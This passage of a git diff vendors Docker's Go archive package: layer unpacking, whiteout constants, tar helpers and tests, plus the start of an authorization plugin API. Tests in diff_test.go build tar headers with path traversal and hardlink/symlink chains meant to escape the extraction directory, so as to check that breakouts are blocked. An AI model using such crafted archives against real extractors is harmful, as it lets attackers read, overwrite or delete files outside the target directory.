+ if fi, err := os.Lstat(path); err == nil { + if !(fi.IsDir() && hdr.Typeflag == tar.TypeDir) { + if err := os.RemoveAll(path); err != nil { + return 0, err + } + } + } + + trBuf.Reset(tr) + srcData := io.Reader(trBuf) + srcHdr := hdr + + // Hard links into /.wh..wh.plnk don't work, as we don't extract that directory, so + // we manually retarget these into the temporary files we extracted them into + if hdr.Typeflag == tar.TypeLink && strings.HasPrefix(filepath.Clean(hdr.Linkname), WhiteoutLinkDir) { + linkBasename := filepath.Base(hdr.Linkname) + srcHdr = aufsHardlinks[linkBasename] + if srcHdr == nil { + return 0, fmt.Errorf("Invalid aufs hardlink") + } + tmpFile, err := os.Open(filepath.Join(aufsTempdir, linkBasename)) + if err != nil { + return 0, err + } + defer tmpFile.Close() + srcData = tmpFile + } + + // if the options contain a uid & gid maps, convert header uid/gid + // entries using the maps such that lchown sets the proper mapped + // uid/gid after writing the file. We only perform this mapping if + // the file isn't already owned by the remapped root UID or GID, as + // that specific uid/gid has no mapping from container -> host, and + // those files already have the proper ownership for inside the + // container. 
+ if srcHdr.Uid != remappedRootUID { + xUID, err := idtools.ToHost(srcHdr.Uid, options.UIDMaps) + if err != nil { + return 0, err + } + srcHdr.Uid = xUID + } + if srcHdr.Gid != remappedRootGID { + xGID, err := idtools.ToHost(srcHdr.Gid, options.GIDMaps) + if err != nil { + return 0, err + } + srcHdr.Gid = xGID + } + if err := createTarFile(path, dest, srcHdr, srcData, true, nil, options.InUserNS); err != nil { + return 0, err + } + + // Directory mtimes must be handled at the end to avoid further + // file creation in them to modify the directory mtime + if hdr.Typeflag == tar.TypeDir { + dirs = append(dirs, hdr) + } + unpackedPaths[path] = struct{}{} + } + } + + for _, hdr := range dirs { + path := filepath.Join(dest, hdr.Name) + if err := system.Chtimes(path, hdr.AccessTime, hdr.ModTime); err != nil { + return 0, err + } + } + + return size, nil +} + +// ApplyLayer parses a diff in the standard layer format from `layer`, +// and applies it to the directory `dest`. The stream `layer` can be +// compressed or uncompressed. +// Returns the size in bytes of the contents of the layer. +func ApplyLayer(dest string, layer io.Reader) (int64, error) { + return applyLayerHandler(dest, layer, &TarOptions{}, true) +} + +// ApplyUncompressedLayer parses a diff in the standard layer format from +// `layer`, and applies it to the directory `dest`. The stream `layer` +// can only be uncompressed. +// Returns the size in bytes of the contents of the layer. 
+func ApplyUncompressedLayer(dest string, layer io.Reader, options *TarOptions) (int64, error) { + return applyLayerHandler(dest, layer, options, false) +} + +// do the bulk load of ApplyLayer, but allow for not calling DecompressStream +func applyLayerHandler(dest string, layer io.Reader, options *TarOptions, decompress bool) (int64, error) { + dest = filepath.Clean(dest) + + // We need to be able to set any perms + oldmask, err := system.Umask(0) + if err != nil { + return 0, err + } + defer system.Umask(oldmask) // ignore err, ErrNotSupportedPlatform + + if decompress { + layer, err = DecompressStream(layer) + if err != nil { + return 0, err + } + } + return UnpackLayer(dest, layer, options) +} diff --git a/vendor/github.com/docker/docker/pkg/archive/diff_test.go b/vendor/github.com/docker/docker/pkg/archive/diff_test.go new file mode 100644 index 0000000000..8167941ac0 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/archive/diff_test.go @@ -0,0 +1,386 @@ +package archive + +import ( + "archive/tar" + "io" + "io/ioutil" + "os" + "path/filepath" + "reflect" + "runtime" + "testing" + + "github.com/docker/docker/pkg/ioutils" +) + +func TestApplyLayerInvalidFilenames(t *testing.T) { + // TODO Windows: Figure out how to fix this test. + if runtime.GOOS == "windows" { + t.Skip("Passes but hits breakoutError: platform and architecture is not supported") + } + for i, headers := range [][]*tar.Header{ + { + { + Name: "../victim/dotdot", + Typeflag: tar.TypeReg, + Mode: 0644, + }, + }, + { + { + // Note the leading slash + Name: "/../victim/slash-dotdot", + Typeflag: tar.TypeReg, + Mode: 0644, + }, + }, + } { + if err := testBreakout("applylayer", "docker-TestApplyLayerInvalidFilenames", headers); err != nil { + t.Fatalf("i=%d. 
%v", i, err) + } + } +} + +func TestApplyLayerInvalidHardlink(t *testing.T) { + if runtime.GOOS == "windows" { + t.Skip("TypeLink support on Windows") + } + for i, headers := range [][]*tar.Header{ + { // try reading victim/hello (../) + { + Name: "dotdot", + Typeflag: tar.TypeLink, + Linkname: "../victim/hello", + Mode: 0644, + }, + }, + { // try reading victim/hello (/../) + { + Name: "slash-dotdot", + Typeflag: tar.TypeLink, + // Note the leading slash + Linkname: "/../victim/hello", + Mode: 0644, + }, + }, + { // try writing victim/file + { + Name: "loophole-victim", + Typeflag: tar.TypeLink, + Linkname: "../victim", + Mode: 0755, + }, + { + Name: "loophole-victim/file", + Typeflag: tar.TypeReg, + Mode: 0644, + }, + }, + { // try reading victim/hello (hardlink, symlink) + { + Name: "loophole-victim", + Typeflag: tar.TypeLink, + Linkname: "../victim", + Mode: 0755, + }, + { + Name: "symlink", + Typeflag: tar.TypeSymlink, + Linkname: "loophole-victim/hello", + Mode: 0644, + }, + }, + { // Try reading victim/hello (hardlink, hardlink) + { + Name: "loophole-victim", + Typeflag: tar.TypeLink, + Linkname: "../victim", + Mode: 0755, + }, + { + Name: "hardlink", + Typeflag: tar.TypeLink, + Linkname: "loophole-victim/hello", + Mode: 0644, + }, + }, + { // Try removing victim directory (hardlink) + { + Name: "loophole-victim", + Typeflag: tar.TypeLink, + Linkname: "../victim", + Mode: 0755, + }, + { + Name: "loophole-victim", + Typeflag: tar.TypeReg, + Mode: 0644, + }, + }, + } { + if err := testBreakout("applylayer", "docker-TestApplyLayerInvalidHardlink", headers); err != nil { + t.Fatalf("i=%d. 
%v", i, err) + } + } +} + +func TestApplyLayerInvalidSymlink(t *testing.T) { + if runtime.GOOS == "windows" { + t.Skip("TypeSymLink support on Windows") + } + for i, headers := range [][]*tar.Header{ + { // try reading victim/hello (../) + { + Name: "dotdot", + Typeflag: tar.TypeSymlink, + Linkname: "../victim/hello", + Mode: 0644, + }, + }, + { // try reading victim/hello (/../) + { + Name: "slash-dotdot", + Typeflag: tar.TypeSymlink, + // Note the leading slash + Linkname: "/../victim/hello", + Mode: 0644, + }, + }, + { // try writing victim/file + { + Name: "loophole-victim", + Typeflag: tar.TypeSymlink, + Linkname: "../victim", + Mode: 0755, + }, + { + Name: "loophole-victim/file", + Typeflag: tar.TypeReg, + Mode: 0644, + }, + }, + { // try reading victim/hello (symlink, symlink) + { + Name: "loophole-victim", + Typeflag: tar.TypeSymlink, + Linkname: "../victim", + Mode: 0755, + }, + { + Name: "symlink", + Typeflag: tar.TypeSymlink, + Linkname: "loophole-victim/hello", + Mode: 0644, + }, + }, + { // try reading victim/hello (symlink, hardlink) + { + Name: "loophole-victim", + Typeflag: tar.TypeSymlink, + Linkname: "../victim", + Mode: 0755, + }, + { + Name: "hardlink", + Typeflag: tar.TypeLink, + Linkname: "loophole-victim/hello", + Mode: 0644, + }, + }, + { // try removing victim directory (symlink) + { + Name: "loophole-victim", + Typeflag: tar.TypeSymlink, + Linkname: "../victim", + Mode: 0755, + }, + { + Name: "loophole-victim", + Typeflag: tar.TypeReg, + Mode: 0644, + }, + }, + } { + if err := testBreakout("applylayer", "docker-TestApplyLayerInvalidSymlink", headers); err != nil { + t.Fatalf("i=%d. 
%v", i, err) + } + } +} + +func TestApplyLayerWhiteouts(t *testing.T) { + // TODO Windows: Figure out why this test fails + if runtime.GOOS == "windows" { + t.Skip("Failing on Windows") + } + + wd, err := ioutil.TempDir("", "graphdriver-test-whiteouts") + if err != nil { + return + } + defer os.RemoveAll(wd) + + base := []string{ + ".baz", + "bar/", + "bar/bax", + "bar/bay/", + "baz", + "foo/", + "foo/.abc", + "foo/.bcd/", + "foo/.bcd/a", + "foo/cde/", + "foo/cde/def", + "foo/cde/efg", + "foo/fgh", + "foobar", + } + + type tcase struct { + change, expected []string + } + + tcases := []tcase{ + { + base, + base, + }, + { + []string{ + ".bay", + ".wh.baz", + "foo/", + "foo/.bce", + "foo/.wh..wh..opq", + "foo/cde/", + "foo/cde/efg", + }, + []string{ + ".bay", + ".baz", + "bar/", + "bar/bax", + "bar/bay/", + "foo/", + "foo/.bce", + "foo/cde/", + "foo/cde/efg", + "foobar", + }, + }, + { + []string{ + ".bay", + ".wh..baz", + ".wh.foobar", + "foo/", + "foo/.abc", + "foo/.wh.cde", + "bar/", + }, + []string{ + ".bay", + "bar/", + "bar/bax", + "bar/bay/", + "foo/", + "foo/.abc", + "foo/.bce", + }, + }, + { + []string{ + ".abc", + ".wh..wh..opq", + "foobar", + }, + []string{ + ".abc", + "foobar", + }, + }, + } + + for i, tc := range tcases { + l, err := makeTestLayer(tc.change) + if err != nil { + t.Fatal(err) + } + + _, err = UnpackLayer(wd, l, nil) + if err != nil { + t.Fatal(err) + } + err = l.Close() + if err != nil { + t.Fatal(err) + } + + paths, err := readDirContents(wd) + if err != nil { + t.Fatal(err) + } + + if !reflect.DeepEqual(tc.expected, paths) { + t.Fatalf("invalid files for layer %d: expected %q, got %q", i, tc.expected, paths) + } + } + +} + +func makeTestLayer(paths []string) (rc io.ReadCloser, err error) { + tmpDir, err := ioutil.TempDir("", "graphdriver-test-mklayer") + if err != nil { + return + } + defer func() { + if err != nil { + os.RemoveAll(tmpDir) + } + }() + for _, p := range paths { + if p[len(p)-1] == filepath.Separator { + if err = 
os.MkdirAll(filepath.Join(tmpDir, p), 0700); err != nil { + return + } + } else { + if err = ioutil.WriteFile(filepath.Join(tmpDir, p), nil, 0600); err != nil { + return + } + } + } + archive, err := Tar(tmpDir, Uncompressed) + if err != nil { + return + } + return ioutils.NewReadCloserWrapper(archive, func() error { + err := archive.Close() + os.RemoveAll(tmpDir) + return err + }), nil +} + +func readDirContents(root string) ([]string, error) { + var files []string + err := filepath.Walk(root, func(path string, info os.FileInfo, err error) error { + if err != nil { + return err + } + if path == root { + return nil + } + rel, err := filepath.Rel(root, path) + if err != nil { + return err + } + if info.IsDir() { + rel = rel + "/" + } + files = append(files, rel) + return nil + }) + if err != nil { + return nil, err + } + return files, nil +} diff --git a/vendor/github.com/docker/docker/pkg/archive/example_changes.go b/vendor/github.com/docker/docker/pkg/archive/example_changes.go new file mode 100644 index 0000000000..cedd46a408 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/archive/example_changes.go @@ -0,0 +1,97 @@ +// +build ignore + +// Simple tool to create an archive stream from an old and new directory +// +// By default it will stream the comparison of two temporary directories with junk files +package main + +import ( + "flag" + "fmt" + "io" + "io/ioutil" + "os" + "path" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/pkg/archive" +) + +var ( + flDebug = flag.Bool("D", false, "debugging output") + flNewDir = flag.String("newdir", "", "") + flOldDir = flag.String("olddir", "", "") + log = logrus.New() +) + +func main() { + flag.Usage = func() { + fmt.Println("Produce a tar from comparing two directory paths. 
By default a demo tar is created of around 200 files (including hardlinks)") + fmt.Printf("%s [OPTIONS]\n", os.Args[0]) + flag.PrintDefaults() + } + flag.Parse() + log.Out = os.Stderr + if (len(os.Getenv("DEBUG")) > 0) || *flDebug { + logrus.SetLevel(logrus.DebugLevel) + } + var newDir, oldDir string + + if len(*flNewDir) == 0 { + var err error + newDir, err = ioutil.TempDir("", "docker-test-newDir") + if err != nil { + log.Fatal(err) + } + defer os.RemoveAll(newDir) + if _, err := prepareUntarSourceDirectory(100, newDir, true); err != nil { + log.Fatal(err) + } + } else { + newDir = *flNewDir + } + + if len(*flOldDir) == 0 { + oldDir, err := ioutil.TempDir("", "docker-test-oldDir") + if err != nil { + log.Fatal(err) + } + defer os.RemoveAll(oldDir) + } else { + oldDir = *flOldDir + } + + changes, err := archive.ChangesDirs(newDir, oldDir) + if err != nil { + log.Fatal(err) + } + + a, err := archive.ExportChanges(newDir, changes) + if err != nil { + log.Fatal(err) + } + defer a.Close() + + i, err := io.Copy(os.Stdout, a) + if err != nil && err != io.EOF { + log.Fatal(err) + } + fmt.Fprintf(os.Stderr, "wrote archive of %d bytes", i) +} + +func prepareUntarSourceDirectory(numberOfFiles int, targetPath string, makeLinks bool) (int, error) { + fileData := []byte("fooo") + for n := 0; n < numberOfFiles; n++ { + fileName := fmt.Sprintf("file-%d", n) + if err := ioutil.WriteFile(path.Join(targetPath, fileName), fileData, 0700); err != nil { + return 0, err + } + if makeLinks { + if err := os.Link(path.Join(targetPath, fileName), path.Join(targetPath, fileName+"-link")); err != nil { + return 0, err + } + } + } + totalSize := numberOfFiles * len(fileData) + return totalSize, nil +} diff --git a/vendor/github.com/docker/docker/pkg/archive/testdata/broken.tar b/vendor/github.com/docker/docker/pkg/archive/testdata/broken.tar new file mode 100644 index 0000000000000000000000000000000000000000..8f10ea6b87d3eb4fed572349dfe87695603b10a5 GIT binary patch literal 13824 
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 literal 0 HcmV?d00001 diff --git a/vendor/github.com/docker/docker/pkg/archive/time_linux.go b/vendor/github.com/docker/docker/pkg/archive/time_linux.go new file mode 100644 index 0000000000..3448569b1e --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/archive/time_linux.go @@ -0,0 +1,16 @@ +package archive + +import ( + "syscall" + "time" +) + +func timeToTimespec(time time.Time) (ts syscall.Timespec) { + if time.IsZero() { + // Return UTIME_OMIT special value + ts.Sec = 0 + ts.Nsec = ((1 << 30) - 2) + return + } + return syscall.NsecToTimespec(time.UnixNano()) +} diff --git a/vendor/github.com/docker/docker/pkg/archive/time_unsupported.go b/vendor/github.com/docker/docker/pkg/archive/time_unsupported.go new file mode 100644 index 0000000000..e85aac0540 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/archive/time_unsupported.go @@ -0,0 +1,16 @@ +// +build !linux + +package archive + +import ( + "syscall" + "time" +) + +func timeToTimespec(time time.Time) (ts syscall.Timespec) { + nsec := int64(0) + if !time.IsZero() { + nsec = time.UnixNano() + } + return syscall.NsecToTimespec(nsec) +} diff --git a/vendor/github.com/docker/docker/pkg/archive/utils_test.go b/vendor/github.com/docker/docker/pkg/archive/utils_test.go new file mode 100644 index 0000000000..01b9e92d1c --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/archive/utils_test.go @@ -0,0 +1,166 @@ +package archive + +import ( + "archive/tar" + "bytes" + "fmt" + "io" + "io/ioutil" + "os" + "path/filepath" + "time" +) + +var testUntarFns = map[string]func(string, 
io.Reader) error{ + "untar": func(dest string, r io.Reader) error { + return Untar(r, dest, nil) + }, + "applylayer": func(dest string, r io.Reader) error { + _, err := ApplyLayer(dest, r) + return err + }, +} + +// testBreakout is a helper function that, within the provided `tmpdir` directory, +// creates a `victim` folder with a generated `hello` file in it. +// `untar` extracts to a directory named `dest`, the tar file created from `headers`. +// +// Here are the tested scenarios: +// - removed `victim` folder (write) +// - removed files from `victim` folder (write) +// - new files in `victim` folder (write) +// - modified files in `victim` folder (write) +// - file in `dest` with same content as `victim/hello` (read) +// +// When using testBreakout make sure you cover one of the scenarios listed above. +func testBreakout(untarFn string, tmpdir string, headers []*tar.Header) error { + tmpdir, err := ioutil.TempDir("", tmpdir) + if err != nil { + return err + } + defer os.RemoveAll(tmpdir) + + dest := filepath.Join(tmpdir, "dest") + if err := os.Mkdir(dest, 0755); err != nil { + return err + } + + victim := filepath.Join(tmpdir, "victim") + if err := os.Mkdir(victim, 0755); err != nil { + return err + } + hello := filepath.Join(victim, "hello") + helloData, err := time.Now().MarshalText() + if err != nil { + return err + } + if err := ioutil.WriteFile(hello, helloData, 0644); err != nil { + return err + } + helloStat, err := os.Stat(hello) + if err != nil { + return err + } + + reader, writer := io.Pipe() + go func() { + t := tar.NewWriter(writer) + for _, hdr := range headers { + t.WriteHeader(hdr) + } + t.Close() + }() + + untar := testUntarFns[untarFn] + if untar == nil { + return fmt.Errorf("could not find untar function %q in testUntarFns", untarFn) + } + if err := untar(dest, reader); err != nil { + if _, ok := err.(breakoutError); !ok { + // If untar returns an error unrelated to an archive breakout, + // then consider this an unexpected error and abort. 
+ return err + } + // Here, untar detected the breakout. + // Let's move on verifying that indeed there was no breakout. + fmt.Printf("breakoutError: %v\n", err) + } + + // Check victim folder + f, err := os.Open(victim) + if err != nil { + // codepath taken if victim folder was removed + return fmt.Errorf("archive breakout: error reading %q: %v", victim, err) + } + defer f.Close() + + // Check contents of victim folder + // + // We are only interested in getting 2 files from the victim folder, because if all is well + // we expect only one result, the `hello` file. If there is a second result, it cannot + // hold the same name `hello` and we assume that a new file got created in the victim folder. + // That is enough to detect an archive breakout. + names, err := f.Readdirnames(2) + if err != nil { + // codepath taken if victim is not a folder + return fmt.Errorf("archive breakout: error reading directory content of %q: %v", victim, err) + } + for _, name := range names { + if name != "hello" { + // codepath taken if new file was created in victim folder + return fmt.Errorf("archive breakout: new file %q", name) + } + } + + // Check victim/hello + f, err = os.Open(hello) + if err != nil { + // codepath taken if read permissions were removed + return fmt.Errorf("archive breakout: could not lstat %q: %v", hello, err) + } + defer f.Close() + b, err := ioutil.ReadAll(f) + if err != nil { + return err + } + fi, err := f.Stat() + if err != nil { + return err + } + if helloStat.IsDir() != fi.IsDir() || + // TODO: cannot check for fi.ModTime() change + helloStat.Mode() != fi.Mode() || + helloStat.Size() != fi.Size() || + !bytes.Equal(helloData, b) { + // codepath taken if hello has been modified + return fmt.Errorf("archive breakout: file %q has been modified. Contents: expected=%q, got=%q. FileInfo: expected=%#v, got=%#v", hello, helloData, b, helloStat, fi) + } + + // Check that nothing in dest/ has the same content as victim/hello. 
+ // Since victim/hello was generated with time.Now(), it is safe to assume + // that any file whose content matches exactly victim/hello, managed somehow + // to access victim/hello. + return filepath.Walk(dest, func(path string, info os.FileInfo, err error) error { + if info.IsDir() { + if err != nil { + // skip directory if error + return filepath.SkipDir + } + // enter directory + return nil + } + if err != nil { + // skip file if error + return nil + } + b, err := ioutil.ReadFile(path) + if err != nil { + // Houston, we have a problem. Aborting (space)walk. + return err + } + if bytes.Equal(helloData, b) { + return fmt.Errorf("archive breakout: file %q has been accessed via %q", hello, path) + } + return nil + }) +} diff --git a/vendor/github.com/docker/docker/pkg/archive/whiteouts.go b/vendor/github.com/docker/docker/pkg/archive/whiteouts.go new file mode 100644 index 0000000000..d20478a10d --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/archive/whiteouts.go @@ -0,0 +1,23 @@ +package archive + +// Whiteouts are files with a special meaning for the layered filesystem. +// Docker uses AUFS whiteout files inside exported archives. In other +// filesystems these files are generated/handled on tar creation/extraction. + +// WhiteoutPrefix prefix means file is a whiteout. If this is followed by a +// filename this means that file has been removed from the base layer. +const WhiteoutPrefix = ".wh." + +// WhiteoutMetaPrefix prefix means whiteout has a special meaning and is not +// for removing an actual file. Normally these files are excluded from exported +// archives. +const WhiteoutMetaPrefix = WhiteoutPrefix + WhiteoutPrefix + +// WhiteoutLinkDir is a directory AUFS uses for storing hardlink links to other +// layers. Normally these should not go into exported archives and all changed +// hardlinks should be copied to the top layer. 
+const WhiteoutLinkDir = WhiteoutMetaPrefix + "plnk" + +// WhiteoutOpaqueDir file means directory has been made opaque - meaning +// readdir calls to this directory do not follow to lower layers. +const WhiteoutOpaqueDir = WhiteoutMetaPrefix + ".opq" diff --git a/vendor/github.com/docker/docker/pkg/archive/wrap.go b/vendor/github.com/docker/docker/pkg/archive/wrap.go new file mode 100644 index 0000000000..b39d12c878 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/archive/wrap.go @@ -0,0 +1,59 @@ +package archive + +import ( + "archive/tar" + "bytes" + "io" +) + +// Generate generates a new archive from the content provided +// as input. +// +// `files` is a sequence of path/content pairs. A new file is +// added to the archive for each pair. +// If the last pair is incomplete, the file is created with an +// empty content. For example: +// +// Generate("foo.txt", "hello world", "emptyfile") +// +// The above call will return an archive with 2 files: +// * ./foo.txt with content "hello world" +// * ./empty with empty content +// +// FIXME: stream content instead of buffering +// FIXME: specify permissions and other archive metadata +func Generate(input ...string) (io.Reader, error) { + files := parseStringPairs(input...) 
+ buf := new(bytes.Buffer) + tw := tar.NewWriter(buf) + for _, file := range files { + name, content := file[0], file[1] + hdr := &tar.Header{ + Name: name, + Size: int64(len(content)), + } + if err := tw.WriteHeader(hdr); err != nil { + return nil, err + } + if _, err := tw.Write([]byte(content)); err != nil { + return nil, err + } + } + if err := tw.Close(); err != nil { + return nil, err + } + return buf, nil +} + +func parseStringPairs(input ...string) (output [][2]string) { + output = make([][2]string, 0, len(input)/2+1) + for i := 0; i < len(input); i += 2 { + var pair [2]string + pair[0] = input[i] + if i+1 < len(input) { + pair[1] = input[i+1] + } + output = append(output, pair) + } + return +} diff --git a/vendor/github.com/docker/docker/pkg/archive/wrap_test.go b/vendor/github.com/docker/docker/pkg/archive/wrap_test.go new file mode 100644 index 0000000000..46ab36697a --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/archive/wrap_test.go @@ -0,0 +1,98 @@ +package archive + +import ( + "archive/tar" + "bytes" + "io" + "testing" +) + +func TestGenerateEmptyFile(t *testing.T) { + archive, err := Generate("emptyFile") + if err != nil { + t.Fatal(err) + } + if archive == nil { + t.Fatal("The generated archive should not be nil.") + } + + expectedFiles := [][]string{ + {"emptyFile", ""}, + } + + tr := tar.NewReader(archive) + actualFiles := make([][]string, 0, 10) + i := 0 + for { + hdr, err := tr.Next() + if err == io.EOF { + break + } + if err != nil { + t.Fatal(err) + } + buf := new(bytes.Buffer) + buf.ReadFrom(tr) + content := buf.String() + actualFiles = append(actualFiles, []string{hdr.Name, content}) + i++ + } + if len(actualFiles) != len(expectedFiles) { + t.Fatalf("Number of expected file %d, got %d.", len(expectedFiles), len(actualFiles)) + } + for i := 0; i < len(expectedFiles); i++ { + actual := actualFiles[i] + expected := expectedFiles[i] + if actual[0] != expected[0] { + t.Fatalf("Expected name '%s', Actual name '%s'", expected[0], 
actual[0]) + } + if actual[1] != expected[1] { + t.Fatalf("Expected content '%s', Actual content '%s'", expected[1], actual[1]) + } + } +} + +func TestGenerateWithContent(t *testing.T) { + archive, err := Generate("file", "content") + if err != nil { + t.Fatal(err) + } + if archive == nil { + t.Fatal("The generated archive should not be nil.") + } + + expectedFiles := [][]string{ + {"file", "content"}, + } + + tr := tar.NewReader(archive) + actualFiles := make([][]string, 0, 10) + i := 0 + for { + hdr, err := tr.Next() + if err == io.EOF { + break + } + if err != nil { + t.Fatal(err) + } + buf := new(bytes.Buffer) + buf.ReadFrom(tr) + content := buf.String() + actualFiles = append(actualFiles, []string{hdr.Name, content}) + i++ + } + if len(actualFiles) != len(expectedFiles) { + t.Fatalf("Number of expected file %d, got %d.", len(expectedFiles), len(actualFiles)) + } + for i := 0; i < len(expectedFiles); i++ { + actual := actualFiles[i] + expected := expectedFiles[i] + if actual[0] != expected[0] { + t.Fatalf("Expected name '%s', Actual name '%s'", expected[0], actual[0]) + } + if actual[1] != expected[1] { + t.Fatalf("Expected content '%s', Actual content '%s'", expected[1], actual[1]) + } + } +} diff --git a/vendor/github.com/docker/docker/pkg/authorization/api.go b/vendor/github.com/docker/docker/pkg/authorization/api.go new file mode 100644 index 0000000000..05c75f1a67 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/authorization/api.go @@ -0,0 +1,88 @@ +package authorization + +import ( + "crypto/x509" + "encoding/json" + "encoding/pem" +) + +const ( + // AuthZApiRequest is the url for daemon request authorization + AuthZApiRequest = "AuthZPlugin.AuthZReq" + + // AuthZApiResponse is the url for daemon response authorization + AuthZApiResponse = "AuthZPlugin.AuthZRes" + + // AuthZApiImplements is the name of the interface all AuthZ plugins implement + AuthZApiImplements = "authz" +) + +// PeerCertificate is a wrapper around x509.Certificate which 
provides a sane +// enconding/decoding to/from PEM format and JSON. +type PeerCertificate x509.Certificate + +// MarshalJSON returns the JSON encoded pem bytes of a PeerCertificate. +func (pc *PeerCertificate) MarshalJSON() ([]byte, error) { + b := pem.EncodeToMemory(&pem.Block{Type: "CERTIFICATE", Bytes: pc.Raw}) + return json.Marshal(b) +} + +// UnmarshalJSON populates a new PeerCertificate struct from JSON data. +func (pc *PeerCertificate) UnmarshalJSON(b []byte) error { + var buf []byte + if err := json.Unmarshal(b, &buf); err != nil { + return err + } + derBytes, _ := pem.Decode(buf) + c, err := x509.ParseCertificate(derBytes.Bytes) + if err != nil { + return err + } + *pc = PeerCertificate(*c) + return nil +} + +// Request holds data required for authZ plugins +type Request struct { + // User holds the user extracted by AuthN mechanism + User string `json:"User,omitempty"` + + // UserAuthNMethod holds the mechanism used to extract user details (e.g., krb) + UserAuthNMethod string `json:"UserAuthNMethod,omitempty"` + + // RequestMethod holds the HTTP method (GET/POST/PUT) + RequestMethod string `json:"RequestMethod,omitempty"` + + // RequestUri holds the full HTTP uri (e.g., /v1.21/version) + RequestURI string `json:"RequestUri,omitempty"` + + // RequestBody stores the raw request body sent to the docker daemon + RequestBody []byte `json:"RequestBody,omitempty"` + + // RequestHeaders stores the raw request headers sent to the docker daemon + RequestHeaders map[string]string `json:"RequestHeaders,omitempty"` + + // RequestPeerCertificates stores the request's TLS peer certificates in PEM format + RequestPeerCertificates []*PeerCertificate `json:"RequestPeerCertificates,omitempty"` + + // ResponseStatusCode stores the status code returned from docker daemon + ResponseStatusCode int `json:"ResponseStatusCode,omitempty"` + + // ResponseBody stores the raw response body sent from docker daemon + ResponseBody []byte `json:"ResponseBody,omitempty"` 